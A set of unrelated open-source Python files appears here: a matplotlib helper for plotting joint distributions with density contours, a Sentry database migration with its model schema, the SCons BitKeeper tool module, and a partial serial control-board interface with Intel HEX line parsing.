"""
fracs = []
for (icollection, collection) in enumerate(contours.collections):
path = collection.get_paths()[0]
pathxy = path.vertices
frac = frac_inside_poly(x,y,pathxy)
fracs.append(frac)
return fracs
def frac_label_contours(x, y, contours, format='%.3f'):
"""Label contours according to the fraction of points x,y inside.
"""
fracs = fracs_inside_contours(x,y,contours)
levels = contours.levels
labels = {}
for (level, frac) in zip(levels, fracs):
labels[level] = format % frac
contours.clabel(fmt=labels)
def contour_enclosing(x, y, fractions, xgrid, ygrid, zvals,
axes, nstart = 200,
*args, **kwargs):
"""Plot contours encompassing specified fractions of points x,y.
"""
print fractions
# Generate a large set of contours initially.
contours = axes.contour(xgrid, ygrid, zvals, nstart,
extend='both')
# Set up fracs and levs for interpolation.
levs = contours.levels
fracs = np.array(fracs_inside_contours(x,y,contours))
sortinds = np.argsort(fracs)
levs = levs[sortinds]
fracs = fracs[sortinds]
# Find the levels that give the specified fractions.
levels = scipy.interp(fractions, fracs, levs)
# Remove the old contours from the graph.
for coll in contours.collections:
coll.remove()
# Reset the contours
contours.__init__(axes, xgrid, ygrid, zvals, levels, *args, **kwargs)
return contours
def plot2Ddist(variables, axeslist=None, truevalues=None,
trimto=None, thin=1, histbinslist=[100, 100],
labels=None, scaleview=True,
plotscatter=True, plothists=True, plotcontours=True,
contourKDEthin=1, contourNGrid=100,
contourFractions=[0.6827, 0.9545, 0.9973],
labelcontours=True, returncontours=False,
scatterstyle={}, histstyle={}, contourstyle={}, **styleArgs):
"""Plot joint distribution of two variables, with marginal histograms.
The resulting graphic includes (at your discretion):
* a scatter plot of the 2D distribution of the two variables
* estimated density contours for the distribution
* marginal histograms for each variable
See plot2Ddist_example.py for an example:
> plot2Ddist([a, b], truevalues=[intercept, slope], **styleargs)
Notes
-----
The contour plotting can be quite slow for large samples because
of the gaussian kernel density estimation. Try passing a larger
value for contourKDEthin to speed it up.
Inputs
------
variables -- list-like of length 2
a list of two array-like or pymc.Variable objects. The lengths
of the arrays or variable traces should be equal.
axeslist -- list-like of length 3
a list of three Matplotlib Axes for: the joint plot, marginal
x histogram, and marginal y histogram, respectively.
truevalues -- list-like of length 2
a list of the true values for each variable
trimto -- int
plot only the last trimto elements of each variable
thin -- int
plot only every thin-th element of each variable
histbinlist -- list-like of length 2
specify the bins (number or limits) for x and y marginal histograms.
labels -- list-like of two strings
the x and y axis labels
scaleview -- bool
whether to set the axes limits according to the plotted data
plotscatter, plothists, plotcontours -- bool
whether to plot the scatter, marginal histograms, and contours
scatterstyle, histstyle, contourstyle -- dict-like
additional keyword arguments for the plot, hist, or contour commands
contourKDEthin -- int
factor by which to thin the samples before calculating the
gaussian kernel density estimate for contouring
contourNGrid -- int
size of the grid to use (in each dimension) for the contour plotting
contourFractions -- list-like
countours are chosen to include the fractions of points specified here
labelcontours -- bool
whether to label the contours with the fraction of points enclosed
styleArgs --
leftover arguments are passed to both the plot and hist commands
"""
### Set up figures and axes. ###
if axeslist is None:
fig1 = pylab.figure(figsize=(6,6))
fig1.set_label('traces')
ax1 = pylab.gca()
divider = make_axes_locatable(ax1)
ax2 = divider.append_axes("top", 1.5, pad=0.0, sharex=ax1)
ax3 = divider.append_axes("right", 1.5, pad=0.0, sharey=ax1)
for tl in (ax2.get_xticklabels() + ax2.get_yticklabels() +
ax3.get_xticklabels() + ax3.get_yticklabels()):
tl.set_visible(False)
axeslist = (ax1, ax2, ax3)
elif (len(axeslist) == 1):
ax1 = axeslist[0]
divider = make_axes_locatable(ax1)
ax2 = divider.append_axes("top", 1.5, pad=0.0, sharex=ax1)
ax3 = divider.append_axes("right", 1.5, pad=0.0, sharey=ax1)
for tl in (ax2.get_xticklabels() + ax2.get_yticklabels() +
ax3.get_xticklabels() + ax3.get_yticklabels()):
tl.set_visible(False)
axeslist = (ax1, ax2, ax3)
else:
ax1, ax2, ax3 = axeslist
# Thin and trim variables.
if labels is None:
passedlabels = False
labels = [None, None]
else:
passedlabels = True
for (ivar, variable) in enumerate(variables):
# Get the trace if this is a pymc.Variable object.
if isinstance(variable, pymc.Variable):
variables[ivar] = variable.trace()
if hasattr(variable, '__name__') and not passedlabels:
labels[ivar] = variable.__name__
if trimto is None:
trimto = len(variables[0])
x = variables[0][-trimto::thin]
y = variables[1][-trimto::thin]
### Plot the variables. ###
# Plot 2D scatter of variables.
if plotscatter:
style = {'ls':'', 'marker':',', 'color':'r', 'alpha':'0.5'}
style.update(styleArgs)
style.update(scatterstyle)
ax1.plot(x, y, **style)
if plotcontours:
xkde = variables[0][-trimto::contourKDEthin]
ykde = variables[1][-trimto::contourKDEthin]
# Inspired by Abraham Flaxman's https://gist.github.com/626689
style = {'linewidths':2.0, 'alpha':0.75,
#'cmap':matplotlib.cm.Greys,
'zorder':10}
style.update(styleArgs)
style.update(contourstyle)
if 'color' in style:
style['colors'] = style['color']
gkde = scipy.stats.gaussian_kde([xkde,ykde])
xgrid, ygrid = np.mgrid[min(x):max(x):contourNGrid * 1j,
min(y):max(y):contourNGrid * 1j]
zvals = np.array(gkde.evaluate([xgrid.flatten(),
ygrid.flatten()])
).reshape(xgrid.shape)
contours = contour_enclosing(x, y, contourFractions,
xgrid, ygrid, zvals,
ax1, **style)
# Plot marginal histograms.
if plothists:
style = {'normed':True}
style.update(styleArgs)
style.update(histstyle)
ax2.hist(x, histbinslist[0], **style)
ax3.hist(y, histbinslist[1], orientation='horizontal', **style)
# Plot lines for the true values.
if truevalues is not None:
ax1.axvline(x=truevalues[0], ls=':', c='k')
ax1.axhline(y=truevalues[1], ls=':', c='k')
ax2.axvline(x=truevalues[0], ls=':', c='k')
ax3.axhline(y=truevalues[1], ls=':', c='k')
if scaleview:
ax2.relim()
ax3.relim()
ax1.relim()
ax2.autoscale_view(tight=True)
ax3.autoscale_view(tight=True)
ax1.autoscale_view(tight=True)
ax2.set_ylim(bottom=0)
ax3.set_xlim(left=0)
if labels[0] is not None:
ax1.set_xlabel(labels[0])
if labels[1] is not None:
ax1.set_ylabel(labels[1])
if plotcontours and labelcontours:
frac_label_contours(x, y, contours)
if plotcontours and returncontours:
return axeslist, contours
else:
return axeslist
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
from sentry.receivers.rules import create_default_rules
Project = orm['sentry.Project']
Rule = orm['sentry.Rule']
for project in Project.objects.all():
create_default_rules(instance=project, created=True, RuleModel=Rule)
def backwards(self, orm):
pass
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.TeamMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
}, 'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
symmetrical = True
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""SCons.Tool.BitKeeper.py
Tool-specific initialization for the BitKeeper source code control
system.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/BitKeeper.py 2014/07/05 09:42:21 garyo"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
"""Add a Builder factory function and construction variables for
BitKeeper to an Environment."""
def BitKeeperFactory(env=env):
""" """
import SCons.Warnings as W
W.warn(W.DeprecatedSourceCodeWarning, """The BitKeeper() factory is deprecated and there is no replacement.""")
act = SCons.Action.Action("$BITKEEPERCOM", "$BITKEEPERCOMSTR")
return SCons.Builder.Builder(action = act, env = env)
#setattr(env, 'BitKeeper', BitKeeperFactory)
env.BitKeeper = BitKeeperFactory
env['BITKEEPER'] = 'bk'
env['BITKEEPERGET'] = '$BITKEEPER get'
env['BITKEEPERGETFLAGS'] = SCons.Util.CLVar('')
env['BITKEEPERCOM'] = '$BITKEEPERGET $BITKEEPERGETFLAGS $TARGET'
def exists(env):
return env.Detect('bk')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# (C) 2013 Andy McCormick, Ryan Schuster
# MIT license
# see LICENSE.txt for details
import regtran
# control board interface module
# TODO:
# factor out HEX file parsing to a separate module
def wordToByteString(word):
return eval('"\\x' + hex(word & 0xff)[2:].rjust(2, '0') + '\\x' + hex((word & 0xff00) >> 8)[2:].rjust(2, '0') + '"')
class ControlBoard:
REG_STATE = 's'
REG_ADDRESS = 'a'
REG_FLASH = 'p'
REG_EEPROM = 'e'
REG_TEST = 't'
REG_MOTION = 'm'
def __init__(self):
self.regtran = regtran.RegTran()
def open(self, port, baud):
self.regtran.channelOpen(port, baud, 2)
def close(self):
self.regtran.channelClose()
def reset(self):
self.regtran.reset()
def protocolTest(self):
return self.regtran.commandRead(ControlBoard.REG_TEST)
def getState(self):
return self.regtran.commandRead(ControlBoard.REG_STATE)
def pmodeStart(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'program'.ljust(32))
def pmodeEnd(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'idle'.ljust(32))
def sampleStart(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'sample'.ljust(32))
def sampleEnd(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'idle'.ljust(32))
def resetSlave(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'reset'.ljust(32));
def erase(self):
self.regtran.commandWrite(ControlBoard.REG_STATE, 'erase'.ljust(32))
def writeEeprom(self, address, data):
self.regtran.commandWrite(ControlBoard.REG_ADDRESS, wordToByteString(address).ljust(32))
self.regtran.commandWrite(ControlBoard.REG_EEPROM, data)
def readEeprom(self, address):
self.regtran.commandWrite(ControlBoard.REG_ADDRESS, wordToByteString(address).ljust(32))
return self.regtran.commandRead(ControlBoard.REG_EEPROM)
def parseHexLine(self, line):
line = line.rstrip()
if len(line) < 11:
print "invalid HEX line (too short)"
return False
if line[0] != ':':
print "invalid HEX line (no start colon)"
return False
byteCount = int(line[1:3], 16)
if len(line) != 2 * byteCount + 11:
print "invalid HEX line (byte count mismatch, found ", len(line), " expected ", 2 * byteCount + 11, ")"
return False
address = int(line[3:7], 16)
addressString = '"\\x' + line[5:7] + '\\x' + line[3:5] + '"'
# TODO: check address
recordType = int(line[7:9], 16)
dataString = '"'
for i in range(byteCount):
dataString = dataString + '\\x' + line[9 + i * 2 : 11 + i * 2]
dataString = dataString + '"'
data = eval(dataString)
checksum = int(line[9 + byteCount * 2 : 11 + byteCount * 2], 16)
# TODO: check checksum
if recordType == 0:
return (address >> 1, data)
elif recordType == 1:
return False
else:
